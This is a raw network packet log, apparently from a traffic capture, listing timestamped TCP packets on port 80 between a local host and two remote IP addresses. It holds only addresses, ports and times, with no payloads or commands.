                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.629800081 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.629812002 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.629816055 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.629857063 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.629863977 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.629899979 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.629905939 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.629939079 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.629940033 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.629978895 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.629987001 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630022049 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630031109 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630060911 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630064964 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630099058 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630114079 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630139112 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630146027 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630178928 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630182028 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630219936 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630228043 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630259037 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630287886 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630296946 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630321026 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630336046 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630347967 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630376101 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630404949 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630420923 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630439997 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630460024 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630469084 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630501032 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630511999 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630541086 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630551100 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630579948 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630582094 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630621910 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630660057 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630671978 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630700111 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630706072 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630743027 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630758047 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630784035 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630824089 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630825043 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630861998 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630868912 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630899906 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630904913 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630940914 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630945921 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.630980968 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631017923 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631027937 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631057978 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631068945 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631097078 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631103039 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631134987 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631135941 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631174088 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631185055 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631213903 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631217957 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631254911 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631266117 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631294012 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631297112 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631333113 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631371975 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631382942 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631408930 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631412983 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631449938 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631450891 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631488085 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631493092 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631526947 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631545067 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631566048 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631575108 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631606102 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631611109 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631645918 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631649971 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631685019 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631699085 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631726027 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631731987 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631763935 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631803989 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631841898 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631870031 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631880999 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631881952 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631920099 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631923914 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631944895 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631959915 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631975889 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.631998062 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632034063 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632038116 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632045984 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632080078 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632124901 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632145882 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632150888 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632184982 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632206917 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632224083 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632229090 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632263899 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632272005 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632302046 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632308006 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632342100 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632344961 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632381916 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632391930 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632421017 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632428885 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632461071 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632466078 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632499933 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632502079 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632539988 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632550955 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632586956 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632627010 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632637978 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632666111 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632673979 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632704973 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632719040 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632745028 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632755041 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632781982 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632796049 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632823944 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632869005 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632879019 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632908106 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632947922 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632975101 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.632986069 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.633001089 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.674767971 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.712919950 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.712984085 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713068008 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713100910 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713140965 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713165998 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713212967 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713300943 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713370085 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713433981 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713490963 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713542938 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713603020 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713634968 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713671923 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713710070 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713732004 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713756084 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713787079 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713824987 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713845968 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713877916 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713902950 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713949919 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.713968039 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.714003086 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.714040995 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.714063883 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.714098930 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.714153051 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.714190960 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.714215994 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.714251041 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.714272976 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.714688063 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.829355955 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.829437017 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.829477072 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.829483986 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.829536915 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.829576969 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.829617023 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.829633951 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.829655886 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.829675913 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.829694033 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.829735041 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.829760075 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.829773903 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.829811096 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.829849005 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.829858065 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.829890013 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.829895973 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.829931974 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.829971075 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.829976082 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830008984 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830049992 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830079079 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830086946 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830125093 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830128908 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830163956 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830218077 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830255032 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830262899 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830293894 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830302000 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830334902 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830377102 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830415964 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830424070 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830454111 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830461979 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830492973 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830533981 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830570936 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830571890 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830610991 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830648899 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830655098 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830686092 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830713034 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830729008 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830768108 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830805063 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830821991 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830843925 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830846071 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830883980 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830921888 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830960035 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.830996037 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.831001997 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.831026077 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.831037045 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.831077099 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.831084967 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.831116915 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.831157923 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.831196070 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.831204891 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.831238985 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.831244946 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.831279993 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.831316948 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.831326962 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.831356049 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.831393957 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.831433058 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.831439972 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.831471920 CEST8049734176.97.76.106192.168.2.4
